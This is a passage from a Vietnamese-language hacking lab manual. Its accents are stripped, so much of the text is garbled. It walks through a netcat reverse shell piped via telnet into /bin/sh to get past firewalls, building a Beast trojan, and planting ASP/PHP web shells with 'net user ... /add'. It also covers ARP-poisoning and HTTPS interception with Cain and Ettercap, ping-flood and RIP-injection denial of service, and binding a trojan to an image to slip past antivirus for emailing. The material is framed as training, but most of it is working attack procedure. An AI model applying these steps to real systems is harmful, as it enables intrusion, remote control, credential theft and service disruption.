(UNKNOWN) [172.16.84.2] 8080 (?) open

Microsoft Windows 2000 [Version 5.00.2195]

Copyright 1985-1999 Microsoft Corp.

E:\>cd test

cd test

E:\test>dir /w

dir /w

Volume in drive E has no label.Volume Serial Number is B465-452F

Directory of E:\test

[.] [..] head.log NETUSERS.EXE NetView.exe

ntcrash.zip password.txt pwdump.exe

6 File(s) 262,499 bytes

2 Dir(s) 191,488,000 bytes free


31/120



C:\test>exit

exit

sent 20, rcvd 450: NOTSOCK

By gichng ta c c shell v kim soat c my nn nhn.Tuy nhin, sau kt ni

trn, netcat trn my nn nhn cngng lun. yu cu netcat lng nghe trli sau mi ktni, bn dng -L thaycho -l. Lu : -L ch c th p dng cho bn Netcat for Windows, khngp dng cho bn chy trn Linux.

2/Sdng netcat kt ni shell nghch chuyn by pass Firewall:- dng telnet ni ca s netcat ang lng nghe, k a lnh t ca s ny vo lungtelnet nghch chuyn, v gi kt qu vo ca s kia.

V d:

- trn my dng tn cng(172.16.84.1), m2 ca s netcat ln lt lng nghe trn cng 80v 25:

+ ca s Netcat (1)C:\>nc -nvv -l -p 80

listennng on [any] 80 ...

connect to [172.16.84.1] from [172.16.84.2] 1055

pwd

ls -la

_

+ ca s Netcat (2)

C:\>nc -nvv -l -p 25

listening on [any] 25 ...

connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056

/

total 171drwxr-xr-x 17 root root 4096 Feb 5 16:15 .

drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..

drwxr-xr-x 2 root root 4096 Feb 5 08:55 b (?n

drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot

drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev

drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ?drwxr-xr-x 6 root root 4096 Feb 5 08:58 home

drwxr-xr-x 6 root root 4096 Feb 5 08:50 l (?b

drwxr-xr-x 2 root root 7168 De = ? 31 1969 mnt

drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ?

drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt

dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ?

drwx------ 12 root root 4096 Feb 5 16:24 root

drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb (?n


32/120



drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp

drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr

drwxr-xr-x 18 root root 4096 Feb 5 08:52 var

- trn my tnh nn nhn(172.16.84.2), telnet nghch chuyn n my dng tn cng(172.16.84.1), dng /bin/sh kt xut:

[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25

/bin/sh: Trying: command not found

/bin/sh: Connected: command not found

/bin/sh: Escape: command not found

Trying 172.16.84.1...

Connected to 172.16.84.1.

Escape character is '^]'.

_

Telnet trn my nn nhn s chuyn tt c nhng g m chng ta g vo trongca s Netcat (1) - cng 80 kt xut sang cho /bin/sh thi hnh. Kt qu ca/bin/sh c kt xut trli cho my tnh dng tn cng trn ca s Netcat(2) - cng 25. Nhim v ca bn l ch cn g lnh vo ca s Netcat (1) v xemkt qu trong ca s Netcat (2).

Sdti chn cng 80 v 25 v cc cng ny thng khng b firewalls hocfilters lc.

Bi 2: Sdng Trojan Beast v detect trojan.

Mun s dng Trojan Beast, ta cn phi xy dng 1 file Server ci ln my nn nhn,sau file server ny s lng nghe nhng port cnh v t my tn cng ta s connect vomy nn nhn thng qua cng ny.

Chn trojan Beast trong a CD v chy file to trojan.

Ta c th s dng thm cc tnh nng nh AV-FW kill t Firewall trn my iphng, hoc inject vo 1 file khc nh notepad.exe, explore di dng dll. Ta s dngbutton Save Server ti ra file server.exe v chy file my nn nhn v kim tra trntaskmanager ca my nn nhn xem Trojan thc s hot ng.


33/120



By gita s dng chng trnh ti my tn cng connect vo file Server chytrn my ca nn nhn.

Ta th s dng 1 s tnh nng nh l managers file download cc file mnh cn timy nn nhn, hay bn c shutdown, reboot my nn nhn thng qua tnh nng ca tagWindows


34/120



Cch phng chng: Ngoi cch s dng cc chng trnh Anti Virus v Trojan, ta c thda v tnh cht thng thng nhng Trojan ny bt buc phi mport no ra ngoi, ta cth xem bng chng trnh Curr Port hay chng trnh fport.


35/120



Da vo thng tin Currport cung cp ta c th xa ng dn ca file cehclass.exe vxa nhng thng tin v n trong regedit, v startup v.v.

Bi 3: Sdng Trojan di dng Webbase

Trojan dng webbase thng thng ph bin hn trong mi trng web, sau khihacker khai thc c l hng v chim quyn s dng Web Server, hacker s li trojandi dng Webbase v thng qua Trojan ny hacker c th ra vo h thng cho nhng ln sau.c im ca loi Trojan ny l rt kh pht hin, v no chy di dng Web v s dngnhng hm truy sut h thng thng qua cc ngn ng asp, phpv.v, v vy n khng th d

pht hin nh loi trojan kt ni nh netcat, beast v.v.

thc hin bi lab ny trc tin ta phi ci t Web Server gm IIS v Apache.

1/Trojan di dng Web vi ngn ng ASP: Ta s dng Web Server IIS viTrojan c vit bng ngn ng ny, ngi vit gii thiu vi cc bn 2 trojan tiu biu lcmd.asp v zehir4.asp

u tin bn ci t dch v Web IIS(vic ci t kh n gin, hc vin c th tmnh lm phn ny), chp 2 file vo th mc www truy cp thng qua Web.


36/120



Ta nh vo lnh Dir xem thng tin cc file trong h thng, vi trojan nh trn tac th xem c cc thng tin h thng, c th upload,download thng qua tftp, v add uservo h thng v d lnh net user hao hao /add, net Localgroup administrators hao /add .

Vo linkhttp://192.168.1.116/zehir4.asp xem v trojan webbase th 2.

Ta thy Trojan ny hng ha v tin dng hn, vic ly file,xa file hon tonthng qua web, chng ta c th d dng thao tc trn my ca nn nhn.2/Trojan vi ngn ng PHP: Ta s dng Web server Apache vi trojan c vit bngngn ng ny, ngi vit gii thiu n cc bn trojan tiu biu l c99.

u tin bn s dng chng trnh phpeasy ci kt hp 3 gi sau apache, php, vmysql. Tuy nhin trong bi cc bn ch cn s dng php v apache. Chp cc file trojan v thmc www c th chy c cc file ny.


37/120



y l file trojan rt nguy him, n va c th download, upload file, ng thi h trchng ta chy nhng ng dng nh perl, thc thi cc hm h thng, cung cp thng tin v nnnhn hin hnhv.v. Do tnh cht nh vy cho nn Trojan ny c hacker dng rt rng

ri(ngoi ra cn c r57, phpshellv.v).


38/120



Bi 5:

CC PHNG PHP SNIFFER

I/ Gii thiu v SnifferA. TNG QUAN SNIFFER

Sniffer c hiu n gin nh l mt chng trnh c gng nghe ngng cc lulng thng tin trn mt h thng mng

Snifferc s dng nh mt cng c cc nh qun tr mng theo di v bo tr hthng mng. V mt tiu cc, snifferc s dng nh mt cng c vi mc ch nghe lncc thng tin trn mng ly cc thng tin quan trng

Sniffer da vo phng thc tn cng ARP bt gi cc thng tin c truyn quamng.

Tuy nhin nhng giao dch gia cc h thng mng my tnh thng l nhng d liu dngnh phn (binary). Bi vy hiu c nhng d liu dng nh phn ny, cc chng trnhSniffer ny phi c tnh nng phn tch cc nghi thc (Protocol Analysis), cng nh tnh nnggii m (Decode) cc d liu dng nh phn hiu c chng

Mt s cc ng dng ca Sniffer c s dng nh: dsniff, snort, cain, ettercap,sniffer pro

B. HOT NG CA SNIFFER

Sniffer hot ng ch yu da trn dng tn cng ARP.

TN CNG ARP

1. Gii thiuy l mt dng tn cng rt nguy him, gi l Man In The Middle. Trong trng hp

ny ging nh bt my nghe ln, phin lm vic gia my gi v my nhn vn din rabnh thng nn ngi s dng khng h hay bit mnh b tn cng

2. SLc Qu trnh hot ng

Trn cng mt mng, Host A v Host B mun truyn tin cho nhau, cc Packet sc axung tng Datalinkng gi, cc Host phi ng gi MAC ngun, MAC ch vo Frame.

Nh vy trc khi qu trnh truyn D liu, cc Host phi hi a ch MAC ca nhau.

Nu nh Host A khi ng qu trnh hi MAC trc, n s gi broadcast gi tin ARP request

cho tt c cc Host hi MAC Host B, lc Host B c MAC ca Host A, sau Host Bch tr li cho Host A MAC ca Host B(ARP reply ).

C 1 Host C lin tc gi ARP reply cho Host A v Host B a ch MAC ca Host C, nhng lit a ch IP l Host A v Host B. Lc ny Host A c nghmy B c MAC l C. Nh vycc gi tin m Host A gi cho Host B u ba n Host C, gi tin Host B tr li cho HostA cng a n Host C. Nu Host C bt chc nng forwarding th coi nh Host A v Host Bkhng h hay bit rng mnh b tn cng ARP


39/120



.

V d:

Ta c m hnh gm cc host

Attacker: l my hacker dng tn cng ARP

IP: 10.0.0.11MAC: 0000.0000.1011

Victim: l my b tn cng

IP: 10.0.0.12

MAC: 0000.0000.1012

HostA

IP: 10.0.0.13

MAC: 0000.0000.1013

- u tin, HostA mun gi d liu cho Victim, cn phi bit a ch MAC ca Victim lin lc. HostA s gi broadcast ARP Request ti tt c cc my trong cng mngLAN hi xem IP 10.0.0.12 (IP ca Victim) c a ch MAC l bao nhiu.

- Attacker v Victim u nhn c gi tin ARP Request, nhng ch c Victim gi trli gi tin ARP Reply li cho HostA. ARP Reply cha thng tin v IP 10.0.0.12 vMAC 0000.0000.1012 ca Victim

- HostA nhn c gi ARP Realy t Victim, bit c a ch MAC ca Victim l0000.0000.1012 s bt u thc hin lin lc truyn d liu n Victim. Attackerkhng th xem ni dung d liu c truyn gia HostA v Victim

My Attacker mun thc hin ARP attacki vi my Victim. Attacker mun mi gi tinHostA gi n my Victim u c th chp li c xem trm

- Attacker thc hin gi lin tc ARP Reply cha thng tin v IP ca Victim 10.0.0.12,cn a ch MAC l ca Attacker 0000.0000.1011.

- HostA nhn c ARP Reply ngh rng IP Victim 10.0.0.12 c a ch MAC l0000.0000.1011. HostA lu thng tin ny vo bng ARP Cache v thc hin kt ni.

- Lc ny mi thng tin, d liu HostA gi ti my c IP 10.0.0.12 (l my Victim) sgi qua a ch MAC 0000.0000.1011 ca my Attacker.

Host A Host B

Host C


40/120



CAIN (Sdng phn mm CAIN)

1.Yu cu v phn cng:

- cng cn trng 10 Mb-hiu hnh Win 2000/2003/XP-cn phi c Winpcap

2. Ci t:

Chn Next.


41/120



Chn Next.

Chn Finish.


42/120




43/120




44/120



3. Cu hnhCain & Abel cn cu hnh mt vi thng s, mi th c thc iu chnh thng qua bngConfiguration dialog .

Sniffer tab:

-Ti y chng ta chn card mng s dng tin hnh sniffer v tnh nng APR . Check vo Option kch hot hay khng kch hot tnh nng.

-Sniffer tng thch vi Winpcap version 2.3 hay cao hn . Version ny h trcard mng rtnhiu .


45/120



APR tab:

-y l ni bn c th config ARP . Mc nh Cain ngn cch 1 chui gi gi ARP t nnnhn trong vng 30 giy . y thc s l iu cn thit bi v vic xm nhp vo thit b cth s gy ra s khng lu thng tnh hiu . T dialog ny bn c th xc nh thi gian giami ln thc thi ARP, xc nh thng s t s to cho ARP lu thng nhiu,ngc li s khkhn hn trong vic xm nhp .

-Ti mc ny, ta cn ch ti phn Spoofing Options:+Mc u tin cho php ta s dng a ch MAC v IP thc ca my m mnh dang s dng.

+Mc th hai cho php s dng mt IP v a ch MAC gi mo.

(Lu a ch ta chn phi khng trng vi IP ca my khc)

Khi click vo tab filters and ports, ta s thy mt s thng tin v giao thc v cc con s porttng ng vi giao thc .


46/120



Fliter and Ports Tab:

-Ti y bn c th chn kch hot hay khng kch hot cc port ng dng TCP/UDP .

HTTP fields tab:


47/120



-Ti y c 1 list danh sch username v password s dng c HTTP sniffer lc li.-Ti tab ny cho php ta bit dc chng trnh ny s bt 1 s thng tin v trang web nh:+ Mc Username Fields: n s ly thng tin nhng g lin quan n ci tn (user name,

account, web name v.v..) .

+ Mc Password Fields: lanh vc ny sm nhim vai tr ly thng tin v password(login password, user pass, webpass v.v)

4. Cc ng dng ca CAIN:

+ Bo v password manager:

Trc ht n c s dng nh 1 private key bo mt mt s vn cho user . Hu htthng tin trong Protected Storage c m ha.S dng nh 1 key nhn c t viclogon password ca user.Cho php iu ha vic truy cp thng tin owner c th anton truy xut .

Mt vi ng dng ca Windows c nt c trng nn s dng dch v ny: InternetExplorer, Oulook, Oulook Express

+ Gii m password manager:

N cho php bn a user names v passwords cho 1 ti nguyn mng khc v 1 ngdng,sau h thng tng cung cp thng tin v nhng s ving thm thng tin m

bn khng can thip.

+ LSA secrets dumper:

LSA secrets th s dng thng tin password cho accounts dng start mt dch v khcd liu cc b. Dial Up v mt sng dng khc xc nh password nm y .

+ Gii m password Dial-Up:


48/120



+APR:

APR l nt c trng chnh ca chng trnh .N cho php lng nghe v cc mng chuynmch v s tn cng lu thng IP gia cc host . APR poinsion routing thc hin: tncng v nh tuyn chnh xc a chch

APR tn cng cbn thng qua thao tc ca host ARP.Trn 1 a ch IP hay Ethernet khim 2 host mun truyn tin ln nhau th phi bit a ch MAC addresses ca nhau. Host gcthy bng ARP nu m y c 1 MAC addresses tng ng vi a ch IP addresses can. Nu khng, n l a ch broadcasts,mt li yu cu ARP hi a ch MAC ca a chch. Bi v gi thng tin ny c gi trong min broadcasts, n si n nhng ci hostcng subnet, tuy nhin host vi IP address trn l thuyt khi nhn c yu cu s tr li lia ch MAC gc ca n. Tri li nu ARP-IP tip cn a chch ca host th n sn sng

a ra soure host trn ARP cache. iu ny sc dng pht sinh lu thng ARPConfig:Cn chnh 1 vi thng s, iu ny c th thc hin c bng vic ch r vic bt chc

MAC v IP addresses bng vic s dng ARP poision packets . iu ny tht s kh khnkhi khng li vt tch ca vic tn cng bi v ngi tn cng thc t khng bao gigia ch qua li trn mng.Trn mng ngi tn cng lc no cng ln lc gia quan st


49/120



Hnh trn l ta mun tn cng ip t 192.168.0.1 ( 192.168.0.10 .Cng vic tin hnh theo cch Ngi gia, chng trnh s thc hin 1 s tn cng ARP poision, CAIN c th phttrin s tn cng b nhCa nhiu host trong khong thi gian nh nhau, bn cn chn 1 ach bn tri

+ Service manager: ta c th start/stop,pause/continued hay remove bt c 1 dch v no ctrn ca s giao din


50/120



+ Sniffer:

ARP-DNS:

Nt c trng y l cho php DNS tin hnh gi mo thnh 1 DNS-reply c th tncng.

ARP-DNS d dng to ra 1 ip address trn DNS-reply .Sniffer d dng rt ra c tn yu cut gi d liu kt hp vi vic thy c a ch trn bng danh sch.y gi d liu sc chnh li IP address sau re-route i .Lc ny client s bnh la ta d dng

bit c a chch .

ARP-HTTPS:


51/120



ARP-HTTPS cho php vic bt gi v gii m trong s lu thng ca HTTPS gia cc host .y l cng vic kt hp vi cng c Certificate Collector . Khi m nn nhn Start HTTPStrnh duyt ca anh ta s hin ln po-pup bo ng .


52/120



+ Certificates Collector:


53/120




54/120



ETTERCAP

1. Gii Thiu

Ettercap l chng trnh phn tch cc gi tin gi qua mng, v th Ettercap cng l mt phnmm hiu nghim cho php ngi s dng nh hi cc d liu trn mng LAN, k cnhng thng tin c m ha. Ettercap c th gi danh a ch MAC ca card mng b tncng, thay v gi tin c truyn n my tnh cn n th n li c truyn n my tnh cci ettercap ri sau mi truyn n my tnh ch

2. Install trn Linux

Trc khi Install, chng ta cn chun b 3 gi ci sau:

+ ettercap-NG-0.7.1.tar c th download t website

http://prdownloads.sourceforge.net/ettercap+ libpcap-0.8.1.tar

+ libnet-1.1.2.1.tar c th download t website

http://www.packetfactory.net/libnet/dist/

Install libnet:

1. # tar zxvf libnet-1.1.2.1.tar.gz2. # cd libnet3. # ./configure4. # make5. # make installInstall libpcap:

6. # tar zxvf libpcap-1.1.2.1.tar.gz7. # cd libpcap8. # ./configure9. # make10.# make installInstall ettercap:

1. # tar zxvf ettercap-NG-0.7.1.tar.gz2. # cd ettercap-NG-0.7.13. # ./configure4. # make


55/120



5. # make installQu trnh ci t hon tt, trn ca s console xut hin nhng dng thng bo

3. Cu Hnh v S Dng Ettercap

- Mgiao din Ettercap bng cch g dng lnh# ettercap C


56/120



- Trc khi tin hnh cu hnh, ta kim tra option Promisc mode c dc check cha, nucha th chn check

- Trong menu sniff, chn Unified sniffing..


57/120



- Chn card mng s dng

- khi ng qu trnh lng nghe, chn menu start, start sniffing


58/120



Ti dng User Messages se xut hin thng bo cho bit dch vang start ln

- Trong menu Host, chn Scan from hosts


59/120



- Trong menu Mitm, chn Arp poisoning


60/120



-Khng chn parameters, nhn enter b qua-Ti dng User messages xut hin thng bo


61/120



- xem cc host c qut, chn Connections, trong menu View

bt gi, chn host no ang ch active, s hin ra bn cc gi bt c, cc giny s hin th di dng m ha


62/120



- Chn Log all packets and infos trong menu Logging save nhng file logs cha ccgi bt c li

- c thc c cc gi di dng m ha , trong ca s console, g lnh# etterlog p k i ascii logfile.eci | less

4. Tnh Nng Ca Ettercap

Ettercap cung cp cho ta mt s plug-in, bng cch chn nhng plug-in ny, ta c thngdng mt s tnh nng quan trng ca ettercap


63/120



Ngoi ra Ettercap cn c 2 plug-in rt quan trng l arpcop v leech


64/120



N cho php ta c th dng chnh Ettercap bo v my mnh trc cc chng trnh snifferkhc trn mng

1. Arpcop: Nu nghi ngai ang nghe ln trn mng, bn khi ng ettercap v chnplug-in ny, i tng s dng ettercap hay dsniff ta vn c th d tm c, lc mt cas mi s hin th nhng my tnh ang chy cc chng trnh spoofing arp trn mng.

2. Leech: Khi xc nhn c i tng tn cng, ta c th tin hnh c lp my tnh nykhi mng ngay lp tc bng cch s dng plug-in ny. Cn c th dng ettercap pht hincc my b nhim virus ang pht tn trn mng ri c lp chng bng leech, sau dit bngcc chng trnh chng virus rt hiu qu.


65/120



Bi 6:

Tn Cng tchi dch v DoS

I/ Gii thiu:

DoS attack l g? (Denial Of Services Attack )

DoS attack (dch l tn cng t chi dch v ) l kiu tn cng rt li hi, vi loi tn cngny, bn ch cn mt my tnh kt ni Internet l c th thc hin vic tn cng c mytnh ca I phng . thc cht ca DoS attack l hacker s chim dng mt lng ln tinguyn trn server (ti nguyn c th l bng thng, b nh, cpu, a cng, ... ) lm choserver khng th no p ng cc yu cu t cc my ca ngui khc (my ca nhng ngidng bnh thng ) v server c th nhanh chng b ngng hot ng, crash hoc reboot .

Cc loi DoS attack hin ang c bit n v s dng:

a.) Winnuke:

- DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x . Hacker sgi cc gi tin vi d liu Out of Band n cng 139 ca my tnh ch. (Cng 139 chnhl cng NetBIOS, cng ny ch chp nhn cc gi tin c cOut of Band c bt). Khi mytnh ca victim nhn c gi tin ny, mt mn hnh xanh bo li sc hin th ln vinn nhn do chng trnh ca Windows nhn c cc gi tin ny nhng n li khng bit

phn ng vi cc d liu Out Of Band nh th no dn n h thng s b crash .

b.) Ping of Death:

- kiu DoS attack ny, ta ch cn gi mt gi d liu c kch thc ln thng qua lnh pingn my ch th h thng ca h s b treo.

- VD: ping l 65000

c . ) Teardrop:

- Nh ta bit, tt c cc d liu chuyn i trn mng t h thng ngun n h thng chu phi tri qua 2 qu trnh: d liu sc chia ra thnh cc mnh nhh thng ngun,mi mnh u phi c mt gi tr offset nht nh xc nh v tr ca mnh trong gi dliu c chuyn i. Khi cc mnh ny n h thng ch, h thng ch s da vo gi troffset sp xp cc mnh li vi nhau theo th tng nh ban u . Li dng sh, tach cn gi n h thng ch mt lot gi packets vi gi tr offset chng cho ln nhau. Hthng ch s khng th no sp xp li cc packets ny, n khng iu khin c v c th

b crash, reboot hoc ngng hot ng nu s lng gi packets vi gi tr offset chng choln nhau qu ln !


66/120



d. ) SYN Attack:

- Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch ipngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi trli cc ach khng c thc v chI nhn thng tin phn hi t cc a ch ip gi . V y lcc a ch ip khng c thc, nn h thng ch s s chi v ch v cn a cc ``request``chi ny vo b nh, gy lng ph mt lng ng k b nhtrn my ch m ng ra l

phi dng vo vic khc thay cho phi chi thng tin phn hi khng c thc ny . Nu tagi cng mt lc nhiu gi tin c a ch IP gi nh vy th h thng s b qu ti dn n bcrash hoc boot my tnh . == > nm du tay .

e . ) Land Attack:

- _ Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc a ch ip khng cthc, hacker s dng chnh a ch ip ca h thng nn nhn. iu ny s to nn mt vng

lp v tn gia trong chnh h thng nn nhn , gia mt bn cn nhn thng tin phn hicn mt bn th chng bao gigi thng tin phn hi i c . == > Gy ng p lng ng .

f . ) Smurf Attack:

- Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mng khuchi (s nghe lnh ca hacker) v h thng ca nn nhn. Hacker s gi cc gi tin ICMP na ch broadcast ca mng khuch i. iu c bit l cc gi tin ICMP packets ny c ach ip ngun chnh l a ch ip ca nn nhn . Khi cc packets n c a ch broadcastca mng khuch i, cc my tnh trong mng khuch i s tng rng my tnh nn nhn gi gi tin ICMP packets n v chng sng lot gi tr li h thng nn nhn cc gi

tin phn hi ICMP packets. H thng my nn nhn s khng chu ni mt khi lng khngl cc gi tin ny v nhanh chng b ngng hot ng, crash hoc reboot. Nh vy, ch cngi mt lng nh cc gi tin ICMP packets i th h thng mng khuch i s khuch ilng gi tin ICMP packets ny ln gp bI . T l khuch i ph thuc vo s mng tnh ctrong mng khuch I . Nhim v ca cc hacker l c chim c cng nhiu h thngmng hoc routers cho php chuyn trc tip cc gi tin n a ch broadcast khng qua chlc a ch ngun cc u ra ca gi tin . C c cc h thng ny, hacker s d dng tinhnh Smurf Attack trn cc h thng cn tn cng . == > mt my lm chng si nh, chcmy chm li ta nh cho thua .

g . ) UDP Flooding:

- Cch tn cng UDP i hi phi c 2 h thng my cng tham gia. Hackers s lm cho hthng ca mnh i vo mt vng lp trao i cc d liu qua giao thc UDP. V gi mo ach ip ca cc gi tin l a ch loopback (127.0.0.1 ), ri gi gi tin ny n h thng ca nnnhn trn cng UDP echo (7 ). H thng ca nn nhn s tr li li cc messages do127.0.0.1(chnh n ) gi n, kt qu l n si vng mt vng lp v tn. Tuy nhin, cnhiu h thng khng cho dng a ch loopback nn hacker s gi mo mt a ch ip camt my tnh no trn mng nn nhn v tin hnh ngp lt UDP trn h thng ca nnnhn . Nu bn lm cch ny khng thnh cng th chnh my ca bn s by .


67/120



h . ) Tn cng DNS:

- Hacker c thi mt li vo trn Domain Name Server ca h thng nn nhn ri cho chn mt website no ca hacker. Khi my khch yu cu DNS phn tch a ch b xmnhp thnh a ch ip, lp tc DNS ( b hacker thay i cache tm thI ) si thnh a chip m hacker cho chn . Kt qu l thay v phi vo trang Web mun vo th cc nnnhn s vo trang Web do chnh hacker to ra . Mt cch tn cng t chi dch v tht huhiu !.

g . ) Distributed DoS Attacks (DDos ):

- DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers s c thmnhp vo cc mng my tnh c bo mt km, sau ci ln cc h thng ny chng trnhDDoS server. By gicc hackers s hn nhau n thi gian nh s dng DDoS client ktni n cc DDoS servers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tn

cng DDoS n h thng nn nhn .

h.) DRDoS (The Distributed Reflection Denial of Service Attack ):

- y c l l kiu tn cng li hi nht v lm boot my tnh ca i phng nhanh gn nht. Cch lm th cng tng t nh DDos nhng thay v tn cng bng nhiu my tnh th ngItn cng ch cn dng mt my tn cng thng qua cc server ln trn th gii . Vn vi

phng php gi mo a ch IP ca victim, k tn cng s gi cc gi tin n cc servermnh nht, nhanh nht v c ng truyn rng nht nh Yahoo .v.v, cc server ny s

phn hi cc gi tin n a ch ca victim . Vic cng mt lc nhn c nhiu gi tinthng qua cc server ln ny s nhanh chng lm nghn ng truyn ca my tnh nn nhn

v lm crash, reboot my tnh . Cch tn cng ny li hi ch ch cn mt my c kt niInternet n gin vi ng truyn bnh thng cng c thnh bt c h thng c ngtruyn tt nht th giI nu nh ta khng kp ngn chn . Trang Web HVA ca chng ta cng

b DoS va ri bi cch tn cng ny y .

(Trch dn Netsky (vniss))

II/ M t bi lab:

Bi Lab 1: DoS bng cch sdng Ping of death.

Ngoi vic sdng cc tool Nemesy ta cn c th sdng lnh sau c th khi ngping of death

For /L %i in (1,1,100) do start ping [ip victim] l 10000 -t


68/120



Ta c th chy cu lnh ny nhiu ln, c th lm cho my Client b DoS honton.


69/120



Bi lab 2: DoS 1 giao thc khng sdng chng thc(trong bi sdng giao thc RIP)

Trong bi ny chng ta s dng Cisco router chy phin bn RIP version 1 v sdng tool Nemesis t my CD Boot Linux chn vo cc thng ip RIP update trnRouter. Router khi nhn c thng ip update s lu li trong bn nh tuyn. Do vy ta cth thc thi chng trnh Nemesis nhiu ln v lm cho b nhca Routery.

Trc tin ta thlnh sau:nemesis rip -V 1 -c 2 -i 192.168.5.0 -S 192.168.1.51 -D 192.168.1.254

Trong V 1 l ta ang s dng rip version 1, -c 2 l thng tin update, -i192.168.5.0 l route m chng ta qung b, -S 192.168.1.51 l a ch ngun thng tin(c thkhng phi l a ch ca PC, -D 192.168.1.254 l a ch ca fa0/0 Router VSIC1. Sau khithc hin lnh ny, ta kim tra trn router c route ny cha, sau son 1 script c ccroute khc nhau v chy script.


70/120



Qu trnh inject packet vo Router


71/120



Router s b trn Memory

Bn nh tuyn ca Router lc tn cng

Nh vy vi vic chn vo nhng thng tin update ca giao thc khng chng thc,chng ta c th lm cho Router khng hot ng c. iu ny ni ln tm quan trng ca


72/120



chng thc. Trung Nemesis cn rt nhiu option v cc giao thc ARP, OSPF v.v. Hc vinc th t test nhng giao thc cn li.

Bi Lab 3: Sdng flash DDoS

Ngoi vic tn cng trc tip thng qua cc giao thc nh l RIP, OSPF, ARP v.v.Hacker cn c th s dng cc file flash ln cc forum, khi ngi s dng chy file flashny(c th l on phim ) th ng thi s gi HTTP POST n nn nhn. Nh vy nunh file flash ny c ti ln nhiu forum cng nhc nhiu ngi xem cng 1 lc, th vtnh cc Server cha cc file ny tn cng DoS vo Server nn nhn.

Ta s dng file Flash trong CD (Module 8)sau , chy file ny bng internetexplorer, phn tch bng webscarab proxy.


73/120



File flash mrt nhiu ca s Internet Explorer v mi explorer gi HTTP POSTv pha Server nn nhn.


74/120



Bi 7:

Social Engineering

I/ Gii Thiu

K thut la o (Social Engineering) l mt th thut c nhiu hacker s dng chocc cuc thm nhp vo cc h thng mng, my tnh. y l mt trong nhng phng thchiu qunh cp mt khu, thng tin, tn cng vo h thng.

Di y l cu chuyn c tht v mt trong nhng hacker ni ting nht th giitrong vi nm trli y - Kevin Mitnick (M, tng b 8 nm t v ti tn cng vo h thngmy tnh), chuyn gia hng u v k thut Social Engineering. Ln k hoch tn cng vocng ty X, Kevin vn dng k nng ny d tm thng tin lin quan n ng tng gim cv mt tr l ca ng ny. Li dng lc hai ngi i cng tc, anh ta s dng Call ID gi,

nhi ging ni ca vin trl gi n qun tr mng cng ty, yu cu gi mt khu ngnhp vo h thng ca tng gim c v ngi qun mt khu. Qun tr vin kim tra mtvi thng tin v "vin trl", nhng Kevin c thng tin v s khn ngoan tr li. Ktqu l Kevin ly c mt khu v kim sot ton b h thng mng ca cng ty X.

Mt hnh thc la o khc: Mt ngy... xu tri no , bn nhn c in thoi,u dy bn kia l mt ging ni ngt ngo: "Cho anh, dch v m anh ang s dng ticng ty chng ti hin ang b trc trc vi account (ti khon) ca anh. ngh anh gi gpthng tin v ti khon cho chng ti iu chnh li". Mi nghe qua tng nhy l mtkiu la th thin, nhng xc sut thnh cng rt cao, c bit khi ging ni d thng nhmy c trc tng i 1080! Phng cch la o tng t l dng k thut "Fake Email

Login". V nguyn tc, mi khi ng nhp vo hp th th chng ta phi in thng tin tikhon gm username v password ri gi thng tin n mail server x l. Li dng iuny, hacker thit k cc trang ng nhp gi (Fake Login) cc thng tin c gi ncho h.

Tm li, k thut Social Engineering rt a dng, phong ph v cng ht sc nguyhim do tnh hiu qu v s ph bin. K thut ny khng i hi phi s dng qu nhiu yut k thut, thm ch khng c lin quan n k thut thun ty (non-technical). Hacker c ththc hin phng cch ny thng qua th tn, e-mail, in thoi, tip xc trc tip, thng quangi quen, cc mi quan h c nhn... nhm dn d, khai thc cc thng tin do v tnh b titl t pha ngi dng. VN, k thut ny cn kh mi nn khng him trng hp bnhla mt cch d dng. Chng hn nm ngoi, hng lot game th MU Global mt schsnh sanh ti sn (o), khi ngy thin thng tin ti khon ca mnh vo mt e-mail gi moadmin MU ca hacker!

(Trch dn)

II/ Cc bi Lab:

Bi Lab 1: Gi email nc nh km Trojan


75/120



thc hin bi Lab ny, ta s dng chng trnh Mini-binder ghp file trojan vihnh nh, thay i icon v chng trnh Outlook gi email nc danh.

Ghp file hnh nh v file trojan, u tin ta to 1 file trojan, ly 1 file nh v file icobt k ghp.

Ta s dng lnh MMB 60.ico svchost.exe cathu.jpg trojanhao.exe ghp file trojan svchost.exe vi cathu.jpg v vi icon l 60.ico.

Tip theo, ta nn file trojan mi bng Winrar li nhiu ln trnh chng trnh Anti-virus(ty theo phin bn Anti-virus, tuy nhin hu ht cc trojan khng qua mt c ccchng trnh ny) v thay i thng tin ca outlook.


76/120



Ta vo ToolOptionMail setupView Account Chn Account cn thay i vthay i thng tin Your Name v E-mail Address.

Tip theo Attach file nh km vo v gi Email i. Trong bi Tc gi gi ti a chemail [email protected], v sau check mail kim tra th xem mail n cha.


77/120



Bi 8:

Session Hijacking

I/ Gii thiu:Nh ta bit v sniffer (nghe ln trong mng), Hacker c th ly bt k thng tin g

khng c m ha, hay c th fake CA c th ly thng tin trong giao thc HTTPS, bygita c thm 1 k thut na l session hijacking. thc hin c bi lab ny trc tin ta

phi s dng ARP spoof, sau s dng phn mm T-sight hay Hunt ginh ly session tpha my nn nhn.

II/ Thc hin bi Lab

Trong bi Lab, tc gi s dng Vmware thc hin, s dng my th nghipTELNET v SSH. Cn 2 my cn li 1 s dng Window 2000( ci sn tool T-sight) v 1 sLinux test SSH.

Vic ci t phn mm kh d dng, bn cn phi thm phn driver v chuyn v IP192.168.200.0/24 do ang s dng bn Trial.


78/120



Sau khi ci t xong, trn my 192.168.200.1 thit lp cho php cc my khc telnet.V t my 192.168.200.2 telnet n my 192.168.200.1.

